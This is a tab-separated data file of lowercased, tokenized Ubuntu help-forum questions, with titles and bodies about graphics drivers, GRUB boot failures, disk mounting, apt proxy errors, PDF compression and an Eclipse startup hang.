207391	deactivate one graphics device in a sli system	as it is now , i have a gaming laptop ( dell xps m1730 , build dec 2008 ) with 2 geforce 9800m gt with sli activated running ubuntu 12.04 . when i use any graphics river that is aware of acceleration features the system crashes after a short period of time . after i removed and purged jockey my system runs stably but slowly , but i can use it for now ( i have to choose recovery at startup and the resume boot , booting up normal results in a color flickering screen ) . but since the system is runs slowly , i would like to try to work with only one graphics device . i want to first test device a , if that does n't work then test with device b . a testing tool for windows already told me , that one of the cards does n't work properly , but it does n't say which one ( same crashes in windows when programs or desktop uses acceleration ) . therefore i wanted to ask , if there is a way to reinstall any nvidia ( or third party ) driver , deactivate one of the two devices and test the stability ?
207392	unable to change desktop environment in 12.10	i upgraded to 12.10 some days ago and now i 'm unable to change between the environments . i currently have gnome 3 ( with extensions ) , kde and , of course , unity installed . the computer is a lenovo g550 . in the login screen i can get into the menu where the des are listed , but i ca n't select one . i ca n't use a test account of mine , which used gnome 3 , because after i logged in x crashes/restarts . unity works , but i ca n't switch from the broken gnome 3 to unity . what did i broke during the upgrade and how can i fix it ?
207398	ubuntu starts up to grub	when i start my computer , the system starts in grub . if i run these commands ( as follows ) : set root= ( hd0,1 ) linux /vmlinuz root=/dev/sda1 initrd /initrd.img boot i can start ubuntu , but then when i go to restart , it loads to grub and i have to keep typing the commands in grub to boot . how can i fix this so when i turn on my computer ubuntu will run without having to keep typing in these commands every time ?
207402	would like to know the state of my drive / mount	this post may include my own stupidity , so as much as i 'm wallowing from sadness , i just would appreciate some help . originally my hdd is in 2 partitions ( total combined of 160gb , i think ) in c : as 140++gb and d : as 10gb . due to the crash , i decided to run ubuntu , then decided to install it . what happened as following : ubuntu installer crashed . boot up using usb boot key ( created using unetin ) discovered there was totally 0mb free of hdd space ( due to win8 trying to repair itself saw a new partition of 3.7gb ( i think this was the ubuntu file ) *due to the fact that i do not have any form of external hdds , and i needed to install a new os so that i could continue work ( i know , lambast me for this , blasted thundering typhoons ) i proceeded as following . gathered all personal and work files into one big folder , it was 70gb while still in `` try ubuntu '' mode , proceeded to delete every known file except for the one big folder of personal and work files . installed ubuntu . this time it insisted on deleting and installing ubuntu . proceeded with installation . another what seemed to be a hang occured , but i decided to be patient and sleep it off . woke up to find this : my predicament lies within 2 thing : is my drive wiped and repartitioned by ubuntu ? ( that means total loss right ? ) assuming all is not lost , can i retrieve the files ? ( by mounting or anything ? ) please advise . add-on : previously somebody suggested trying sudo mount command : this is what i did alt+f2 , then typing in `` sudo mount 160 gb hard disk '' and `` sudo mount [ 160 gb hard disk ] '' . ( the name of the hdd , oddly ca n't be changed ) . but has yielded no results . the name of the hdd displayed is `` 160gb hard disk '' what more can i do ?
207403	does ubuntu support all video cards equally ?	i 've heard nvidia cards usually have better support than ati , but even within brands , is the support pretty even across different cards or how would i find which video cards are best supported ?
207409	can ubuntu run on windows 8 tablet pcs ?	i was looking at some laptop/tablet hybrids , and i came across the dell xps 12 . it looked like a nice ultrabook convertible , but ( obviously ) it runs windows 8 . can ubuntu run on any ultrabook convertibles ?
207410	jabra headset 's microphone does not show up in sound control	i have just updated to 12.10 , and i noticed that my headset 's microphone is not showing up in the recording tab of the sound settings . but ! using the pulse audio manager , the microphone is there and recognized . it is just not showing up in the sound settings that you can access from the icon besides the clock , and therefore , i cant use it , or dont know how . please help ! thanks .
207411	how can i get rid of the grub menu on ubuntu 12.10 ?	i am rather new to the ubuntu os . everything was running smoothly for a few days , then this menu came up . i do n't remember exactly , but it wo n't let me enter the os . i 've never been that big on programming and computers and other stuff , so i do n't know how to get past this . it says `` grub > '' and i 've tried entering my ubuntu username and password , but i still ca n't get past the screen . help me please ?
207415	12.04 lts side-scrolling for touch pad ?	i know that you can set the touch pad to scroll on the right side , but is it possible to scroll left and right ? i mean , when there are websites that require side scrolling , is it possible to swipe on the top or bottom of the touch pad ?
207421	multi-select group of items in listbox using ctrl+shift+mouse1 ?	for a while since i 've switched to ubuntu from windows , i 've been wondering about this . in windows , you can select an item in a listbox , hold ctrl+shift , then select another item , and all the items between the two that you selected will also be selected ( see the picture below ) . my problem is , in some cases i have a few hundred items to select out of thousands , and the only way to select them is to individually select each of them while holding ctrl . is there a way to enable this ability in ubuntu ( even if it 's just for gtk programs ) ? http : //i.stack.imgur.com/rrvry.png
207423	asus x401a ubuntu installation	i tried to install ubuntu in my laptop asusx401a . i removed windows in the partition table at the installation . all okay up to here , however when i reboot the hd after finish the installation , the hd was not recognized , in the bios it appears that the hd only option was the realtek card , then was impossible to enter to ubuntu . after that i tried again to install ubuntu but now i have a error in the input/output when i wanted the enter the table partition . i appreciate any help .
207431	why ca n't i connect to the internet at all with ubuntu 12.04 lts or 12.10 ?	so one day i was using my server and decided since i had a page of updates that had been piling up . that was my first problem ... i had heard never to update things on ubuntu but i disregarded that . anyways i updated to 12.04 and when it was done it would not let me connect to the internet . i have tried re-installing the operating system but to no avail . i have been using ubuntu for a few months but i 'm not to good with it . thanks .
207434	bash script progress	i am forming a new question based on an earlier one i posted here in regards to a bash script i am writing . this is only one function of the script but i started here because i figured i would have best success with completing this function over others . the code that i have thus-far is : # ! /bin/bash clear ; welcome= '' - sudo bypass package installer - '' ; echo $ welcome ; pkgfetch ( ) { echo -n `` name of package you would like to install : `` ; read pkg chkpkg= $ ( dpkg -s $ pkg|grep installed ) ; echo `` the package [ $ pkg ] is already installed . '' if [ `` '' == `` $ chkpkg '' ] ; then echo `` the package [ $ pkg ] is installing ... '' sudo apt-get install $ pkg -qq echo `` the package [ $ pkg ] was successfully installed . '' fi echo -n `` press enter to return to command-line . '' } ; pkgfetch ; read ; clear ; the first part , which checks if the package is installed ( if it is the script returns the message stating it 's already installed ) appears to be working correctly . however , i encounter a few things here that i ca n't make sense of ... mostly because i am a novice . if [ $ pkg ] is not installed , the script still displays the message saying that it is , followed by the message that should be displayed if not installed , which is that it is currently installing . the script does n't silently install the package . it shows that it is reading database , unpacking $ pkg , processing triggers , and setting up $ pkg . afterwards , the script displays the correct message that `` the package [ $ pkg ] was successfully installed '' . anyone want to take a shot at it here and educate me about my errors ? thanks in advance : - )
207440	i 've filed an itp bug on bugs.debian.org - now how do i get the package into ubuntu ?	i 've written a development library that i would like to include in the ubuntu archives . from what i understand , the best way to do this is to first get the package into debian and then request a package sync . here is the itp bug . what do i do now ? looking at this page , i see horrifying things like `` 419 days in preparation '' and `` last activity 404 days ago '' . i get the impression that getting a package into debian is a slow process . is there anything i can do to speed up the process ? i 've tried to do as much work as i can to smooth out the process - i 've got a branch with debian packaging ( which gets by lintian without any errors ) .
207442	how to add `` open terminal here '' to nautilus ' context menu ?	i am working on ubuntu 12.04 64bit . i want to add `` open terminal here '' to nautilus context or right-click menu but it tries to download 32bit version from internet .
207443	ubuntu 12.10 not updating	i upgraded from ubuntu 12.04 to ubuntu 12.10 . after this it is not updating . the software updater gives the following error : w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/release.gpg unable to connect to 10.4.42.15:8080 : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/release.gpg unable to connect to 10.4.42.15:8080 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal/release.gpg unable to connect to 10.4.42.15:8080 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-updates/release.gpg unable to connect to 10.4.42.15:8080 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-backports/release.gpg unable to connect to 10.4.42.15:8080 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-security/release.gpg unable to connect to 10.4.42.15:8080 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-proposed/release.gpg unable to connect to 10.4.42.15:8080 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal/restricted/source/sources unable to connect to 10.4.42.15:8080 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal/main/source/sources unable to connect to 10.4.42.15:8080 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal/multiverse/source/sources unable to connect to 10.4.42.15:8080 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal/universe/source/sources unable to connect to 10.4.42.15:8080 : : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-proposed/universe/i18n/translation-en unable to connect to 10.4.42.15:8080 : e : some index files failed to download . they have been ignored , or old ones used instead . along with this i am not able to install any thing from software center , it just asks to use this source and after that it just keeps on querying software sources and nothing happens after that the contents of /etc/apt/sources.list are : # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ quantal main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ quantal restricted main multiverse universe # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . deb http : //us.archive.ubuntu.com/ubuntu/ quantal-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ quantal-updates restricted main multiverse universe # added by software-properties # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ quantal universe deb http : //us.archive.ubuntu.com/ubuntu/ quantal-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //us.archive.ubuntu.com/ubuntu/ quantal multiverse deb http : //us.archive.ubuntu.com/ubuntu/ quantal-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse # added by software-properties deb http : //us.archive.ubuntu.com/ubuntu/ quantal-security main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ quantal-security restricted main multiverse universe # added by software-properties deb http : //us.archive.ubuntu.com/ubuntu/ quantal-security universe deb http : //us.archive.ubuntu.com/ubuntu/ quantal-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu quantal main deb-src http : //extras.ubuntu.com/ubuntu quantal main # deb http : //download.learnfree.eu/repository/skss / # skss # deb-src http : //download.learnfree.eu/repository/skss / # skss deb http : //us.archive.ubuntu.com/ubuntu/ quantal-proposed restricted main multiverse universe deb-src http : //us.archive.ubuntu.com/ubuntu/ quantal-proposed restricted main multiverse universe # added by software-properties
207447	how to reduce the size of a pdf file ?	i 'm looking for a way in ubuntu to reduce the size of a pdf ( by reducing the quality of the images ) . i know that this can be done in ghostscript by typing the following command in terminal : gs -sdevice=pdfwrite -dcompatibilitylevel=1.4 -dpdfsettings=/screen -dnopause -dquiet -dbatch -soutputfile=output.pdf input.pdf the problem is that i ca n't specify the quality with any accuracy . the parameter -dpdfsettings=/screen is the one that decides the quality ; but the alternatives are quite rigid ( for example it is possible to do -dpdfsettings=/ebook for slightly better quality ) . i 'm looking for a way to reduce the size of a pdf in a way that allows me to specify the desired quality numerically . i know that this is possible in a mac , so it must be possible in linux -- right ? any help would be well appreciated .
207455	is there a generic usb touchscreen driver 12.04 ?	is there a generic usb touchscreen driver 12.04 ? device 03eb:201c i 've been looking for 4 days solid ( not very skilled ) and ca n't find a solution . i have a generic tablet : c97- atom n2600 9.7 '' 2gb 32gb bluetooth wifi webcam ext.3g windows 7 tablet pc using 12.04 and can not find a driver . i installed android and the touchscreen works but still lots of other bugs . oh well , stuck with windows 7 and not happy about it . will keep trying , but too much time wasted already . if you have a solution i would love to try it . ubuntu @ ubuntu : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 0cf2:6238 ene technology , inc . bus 001 device 003 : id 1a40:0101 terminus technology inc. 4-port hub bus 001 device 005 : id 05e1:0100 syntek semiconductor co. , ltd 802.11g + bluetooth wireless adapter bus 001 device 006 : id 090c:3731 silicon motion , inc. - taiwan ( formerly feiya technology corp. ) bus 003 device 002 : id 03eb:201c atmel corp. at90usbkey sample firmware ( hid mouse ) ( from windows : hid\vid_03eb & pid_201c\6 & 5f38127 & 0 & 0000 usb\vid_03eb & pid_201c\5 & 193adadc & 1 & 2 ) bus 001 device 007 : id 0518:0001 ezkey corp. usb to ps2 adaptor v1.09 bus 001 device 008 : id 192f:0916 avago technologies , pte . ubuntu @ ubuntu : ~ $ sudo lsusb -v bus 003 device 002 : id 03eb:201c atmel corp. at90usbkey sample firmware ( hid mouse ) device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 32 idvendor 0x03eb atmel corp. idproduct 0x201c at90usbkey sample firmware ( hid mouse ) bcddevice 45.a2 imanufacturer 1 cdt iproduct 2 9.75 iserial 0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 34 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x00 ( missing must-be-set bit ! ) ( bus powered ) maxpower 100ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 3 human interface device binterfacesubclass 0 no subclass binterfaceprotocol 0 none iinterface 0 hid device descriptor : blength 9 bdescriptortype 33 bcdhid 1.11 bcountrycode 0 not supported bnumdescriptors 1 bdescriptortype 34 report wdescriptorlength 177 report descriptors : ** unavailable ** endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0020 1x 32 bytes binterval 5 device status : 0x00fb self powered remote wakeup enabled debug mode ubuntu @ ubuntu : ~ $ sudo lshw ubuntu description : notebook product : to be filled by o.e.m . ( to be filled by o.e.m . ) vendor : to be filled by o.e.m . version : to be filled by o.e.m . serial : to be filled by o.e.m . width : 32 bits capabilities : smbios-2.7 dmi-2.7 smp-1.4 smp configuration : boot=normal chassis=notebook cpus=2 family=to be filled by o.e.m . sku=to be filled by o.e.m . uuid=00020003-0004-0005-0006-000700080009 *-core description : motherboard product : tiger hill vendor : intel corporation physical id : 0 version : to be filled by o.e.m . serial : to be filled by o.e.m . slot : to be filled by o.e.m . *-firmware description : bios vendor : american megatrends inc. physical id : 0 version : 4.6.5 date : 08/24/2012 size : 64kib capacity : 960kib capabilities : pci upgrade shadowing cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer acpi usb biosbootspecification *-cpu:0 description : cpu product : intel ( r ) atom ( tm ) cpu n2600 @ 1.60ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : 6.6.1 serial : 0003-0661-0000-0000-0000-0000 slot : cpu 1 size : 1600mhz capacity : 1600mhz width : 64 bits clock : 400mhz capabilities : x86-64 boot fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx constant_tsc arch_perfmon pebs bts nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm movbe lahf_lm arat configuration : cores=2 enabledcores=1 id=2 threads=2 *-cache:0 description : l1 cache physical id : 5 slot : l1-cache size : 24kib capacity : 24kib capabilities : internal write-back unified *-cache:1 description : l2 cache physical id : 6 slot : l2-cache size : 512kib capacity : 512kib capabilities : internal varies unified *-logicalcpu:0 description : logical cpu physical id : 2.1 width : 64 bits capabilities : logical *-logicalcpu:1 description : logical cpu physical id : 2.2 width : 64 bits capabilities : logical *-logicalcpu:2 description : logical cpu physical id : 2.3 width : 64 bits capabilities : logical *-logicalcpu:3 description : logical cpu physical id : 2.4 width : 64 bits capabilities : logical *-memory description : system memory physical id : 28 slot : system board or motherboard size : 2gib *-bank:0 description : sodimm [ empty ] product : [ empty ] vendor : [ empty ] physical id : 0 serial : [ empty ] slot : dimm0 *-bank:1 description : sodimm ddr3 synchronous 800 mhz ( 1.2 ns ) vendor : 69 physical id : 1 serial : 00000210 slot : dimm1 size : 2gib width : 64 bits clock : 800mhz ( 1.2ns ) *-cpu:1 physical id : 1 bus info : cpu @ 1 version : 6.6.1 serial : 0003-0661-0000-0000-0000-0000 size : 1600mhz capabilities : ht configuration : id=2 *-logicalcpu:0 description : logical cpu physical id : 2.1 capabilities : logical *-logicalcpu:1 description : logical cpu physical id : 2.2 capabilities : logical *-logicalcpu:2 description : logical cpu physical id : 2.3 capabilities : logical *-logicalcpu:3 description : logical cpu physical id : 2.4 capabilities : logical *-pci description : host bridge product : atom processor d2xxx/n2xxx dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 03 width : 32 bits clock : 33mhz *-display unclaimed description : vga compatible controller product : atom processor d2xxx/n2xxx integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 32 bits clock : 33mhz capabilities : pm msi vga_controller bus_master cap_list configuration : latency=0 resources : memory : dfe00000-dfefffff ioport : f100 ( size=8 ) *-multimedia description : audio device product : n10/ich 7 family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 02 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:42 memory : dff00000-dff03fff *-pci:0 description : pci bridge product : n10/ich 7 family pci express port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport:2000 ( size=4096 ) memory:80000000-801fffff ioport:80200000 ( size=2097152 ) *-usb:0 description : usb controller product : n10/ich 7 family usb uhci controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:23 ioport : f0a0 ( size=32 ) *-usb:1 description : usb controller product : n10/ich 7 family usb uhci controller # 2 vendor : intel corporation physical id : 1d.1 bus info : pci @ 0000:00:1d.1 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:19 ioport : f080 ( size=32 ) *-usb:2 description : usb controller product : n10/ich 7 family usb uhci controller # 3 vendor : intel corporation physical id : 1d.2 bus info : pci @ 0000:00:1d.2 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:18 ioport : f060 ( size=32 ) *-usb:3 description : usb controller product : n10/ich 7 family usb uhci controller # 4 vendor : intel corporation physical id : 1d.3 bus info : pci @ 0000:00:1d.3 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:16 ioport : f040 ( size=32 ) *-usb:4 description : usb controller product : n10/ich 7 family usb2 ehci controller vendor : intel corporation physical id : 1d.7 bus info : pci @ 0000:00:1d.7 version : 02 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:23 memory : dff05000-dff053ff *-pci:1 description : pci bridge product : 82801 mobile pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : e2 width : 32 bits clock : 33mhz capabilities : pci subtractive_decode bus_master cap_list *-isa description : isa bridge product : nm10 family lpc controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 02 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : latency=0 *-storage description : sata controller product : n10/ich7 family sata controller [ ahci mode ] vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 logical name : scsi0 version : 02 width : 32 bits clock : 66mhz capabilities : storage msi pm ahci_1.0 bus_master cap_list emulated configuration : driver=ahci latency=0 resources : irq:41 ioport : f0f0 ( size=8 ) ioport : f0e0 ( size=4 ) ioport : f0d0 ( size=8 ) ioport : f0c0 ( size=4 ) ioport : f020 ( size=16 ) memory : dff04000-dff043ff *-disk description : ata disk product : biwin ssd physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 1206 serial : 123403501060 size : 29gib ( 32gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=8fbe402b *-volume:0 description : windows ntfs volume physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 version : 3.1 serial : 249bde5d-8246-9a40-88c7-2d5e3bcaf692 size : 19gib capacity : 19gib capabilities : primary bootable ntfs initialized configuration : clustersize=4096 created=2011-04-04 02:27:51 filesystem=ntfs state=clean *-volume:1 description : windows ntfs volume physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 version : 3.1 serial : de12d40f-d5ca-8642-b306-acd9349fda1a size : 10231mib capacity : 10gib capabilities : primary ntfs initialized configuration : clustersize=4096 created=2011-04-04 01:52:26 filesystem=ntfs state=clean *-serial unclaimed description : smbus product : n10/ich 7 family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 02 width : 32 bits clock : 33mhz configuration : latency=0 resources : ioport : f000 ( size=32 ) *-scsi:0 physical id : 2 bus info : usb @ 1:1 logical name : scsi4 capabilities : emulated scsi-host configuration : driver=usb-storage *-disk description : scsi disk physical id : 0.0.0 bus info : scsi @ 4:0.0.0 logical name : /dev/sdb size : 29gib ( 31gb ) capabilities : partitioned partitioned : dos configuration : signature=00017463 *-volume description : windows fat volume vendor : mkdosfs physical id : 1 bus info : scsi @ 4:0.0.0,1 logical name : /dev/sdb1 logical name : /cdrom version : fat32 serial : 129b-4f87 size : 29gib capacity : 29gib capabilities : primary bootable fat initialized configuration : fats=2 filesystem=fat mount.fstype=vfat mount.options=rw , relatime , fmask=0022 , dmask=0022 , codepage=cp437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro state=mounted *-scsi:1 physical id : 3 bus info : usb @ 1:3.1 logical name : scsi6 capabilities : emulated scsi-host configuration : driver=usb-storage *-disk description : scsi disk physical id : 0.0.0 bus info : scsi @ 6:0.0.0 logical name : /dev/sdc size : 7400mib ( 7759mb ) capabilities : partitioned partitioned : dos configuration : signature=c3072e18 *-volume description : windows fat volume vendor : mkdosfs physical id : 1 bus info : scsi @ 6:0.0.0,1 logical name : /dev/sdc1 logical name : /media/joum8g version : fat32 serial : e676-9311 size : 7394mib capacity : 7394mib capabilities : primary bootable fat initialized configuration : fats=2 filesystem=fat label=android mount.fstype=vfat mount.options=rw , nosuid , nodev , relatime , uid=999 , gid=999 , fmask=0022 , dmask=0077 , codepage=cp437 , iocharset=iso8859-1 , shortname=mixed , showexec , utf8 , flush , errors=remount-ro state=mounted ubuntu @ ubuntu : ~ $ ubuntu @ ubuntu : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ plus more enterprise ltd. usb-compliant keyboard id=10 [ slave pointer ( 2 ) ] ⎜ ↳ usb optical mouse id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ sleep button id=8 [ slave keyboard ( 3 ) ] ↳ plus more enterprise ltd. usb-compliant keyboard id=9 [ slave keyboard ( 3 ) ] ↳ usb 2.0 webcam - front id=12 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=13 [ slave keyboard ( 3 ) ] ubuntu @ ubuntu : ~ $
207458	3tb non-boot hard disk on older motherboard	it is time to expand the capacity of my ubuntu home file server so i would like to purchase some 3tb hard disks . however , i am concerned with potential compatibility issues . i 've tried searching around but i have n't found information which clearly addresses my particular situation . my server is running ubuntu 10.04 on an intel p35 chipset based system . the motherboard does not support uefi ( and , by extension , gpt ? ) . however , ubuntu does support > 2tb disks . will i be able to properly utilize these new disks , or does the motherboard limitation trump all else ? the boot disk is < 2tb and will not be updated nor am i dual-booting ; these disks will be used strictly as slaves in a pure ubuntu environment . i 'd hate to pull the trigger on these new disks just to be unpleasantly surprised , so any feedback is appreciated . thanks !
207460	unable to mount hard disk	i am unable to mount hard disk and got this message : unable to mount 158 gb filesystem error mounting : mount : wrong fs type , bad option , bad superblock on /dev/sda1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so from the terminal , i tried syslog - try : no command 'syslog ' found , did you mean : command 'dsyslog ' from package 'dsyslog ' ( universe ) command 'syslogd ' from package 'sysklogd ' ( universe ) command 'syslogd ' from package 'inetutils-syslogd ' ( universe ) command 'syslogd ' from package 'busybox-syslogd ' ( universe ) syslog : command not found also tried dmesg | tail : [ 971.390588 ] sd 0:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 12 62 30 80 00 00 40 00 [ 971.390600 ] end_request : i/o error , dev sda , sector 308424832 [ 971.390605 ] read-error on swap-device ( 8:0:308424840 ) [ 971.390608 ] read-error on swap-device ( 8:0:308424848 ) [ 971.390617 ] read-error on swap-device ( 8:0:308424856 ) [ 971.390620 ] read-error on swap-device ( 8:0:308424864 ) [ 971.390623 ] read-error on swap-device ( 8:0:308424872 ) [ 971.390626 ] read-error on swap-device ( 8:0:308424880 ) [ 971.390629 ] read-error on swap-device ( 8:0:308424888 ) [ 971.390632 ] read-error on swap-device ( 8:0:308424896 ) it was fine before i tried to re-install 12.04 from the live cd ( which failed due to the disk problem ) .
207466	how to run applications as root ?	i am having some strange issue with kate and kwrite . when i click on open file , it crashes with segmentation fault . i am a complete newbie to linux , and i think the issue is that i am not running the application as root . how do i run applications as root in ubuntu ? is it bad practice to do this ? what is the purpose of the whole root thing , where even though we need to use root so frequently , it is not utilized as default ?
207468	boot ubuntu 12.04 in 3d - nomodeset quiet splash install	i would like to enable 3d in ubuntu 12.04 . i recently tried to install ubuntu on a new computer . when the installation was complete and i rebooted the machine , i could only see a blank screen . after some searching , i followed this tutorial which instructed me to boot with `` nomodeset '' enabled . i choose this on the usb i was installing ubuntu 12.04 from . fortunately , the ubuntu installation on the new computer was successful . when i tried to change the size of the unity launcher icons , i did not see that option ( as i see on my other computer running ubuntu 12.04 ) . i tried installing myunity and it told me that the computer i had just installed 12.04 to was running in 2d . to my knowledge . all the software is up to date ( as i ran the software updater ) . in addition , when i look for additional drivers , i see a message that says `` no proprietary drivers are in use on this system '' . when i look under system details > graphics , i see the driver as `` vesa : intel sandybridge/ivybridge graphics . when i hold the shift key on when my machine boots up , and type `` e '' on the grub menu , i see the following towards the end , `` nomodeset quiet splash $ vt_handoff '' . does this have anything to do with the plain 2d ubuntu 12.04 experience ? again , what i 'd like to do now is get the 3d experience on my new machine running 12.04 . please let me know if you need more information .
207471	ca n't start eclipse	it seems that no questions in this site is the same with mine . the eclipse splash window shows up but no progress bar at the bottom of it . i wait a long time but it just hang up there . i 've tried to download the eclipse tarball from eclipse official website , it does n't work either . how can i debug this issue ? thanks . start vm : -dosgi.requiredjavaversion=1.5 -dhelp.lucene.tokenizer=standard -xx : maxpermsize=256m -xms40m -xmx512m -djava.class.path=/home/ftao/downloads/software/eclipse//plugins/org.eclipse.equinox.launcher_1.3.0.v20120522-1813.jar -os linux -ws gtk -arch x86 -showsplash /home/ftao/downloads/software/eclipse//plugins/org.eclipse.platform_4.2.1.v201209141800/splash.bmp -launcher /home/ftao/downloads/software/eclipse/eclipse -name eclipse -- launcher.library /home/ftao/downloads/software/eclipse//plugins/org.eclipse.equinox.launcher.gtk.linux.x86_1.1.200.v20120522-1813/eclipse_1502.so -startup /home/ftao/downloads/software/eclipse//plugins/org.eclipse.equinox.launcher_1.3.0.v20120522-1813.jar -- launcher.overridevmargs -product org.eclipse.epp.package.cpp.product -debug -vm /usr/lib/jvm/java-6-openjdk-i386/jre/bin/../lib/i386/client/libjvm.so -vmargs -dosgi.requiredjavaversion=1.5 -dhelp.lucene.tokenizer=standard -xx : maxpermsize=256m -xms40m -xmx512m -djava.class.path=/home/ftao/downloads/software/eclipse//plugins/org.eclipse.equinox.launcher_1.3.0.v20120522-1813.jar install location : file : /home/ftao/downloads/software/eclipse/ configuration file : file : /home/ftao/downloads/software/eclipse/configuration/config.ini loaded configuration location : file : /home/ftao/downloads/software/eclipse/configuration/ framework located : file : /home/ftao/downloads/software/eclipse/plugins/org.eclipse.osgi_3.8.1.v20120830-144521.jar framework classpath : file : /home/ftao/downloads/software/eclipse/plugins/org.eclipse.osgi_3.8.1.v20120830-144521.jar splash location : /home/ftao/downloads/software/eclipse//plugins/org.eclipse.platform_4.2.1.v201209141800/splash.bmp debug options : file : /home/ftao/downloads/software/eclipse/.options not found time to load bundles : 4 starting application : 1679
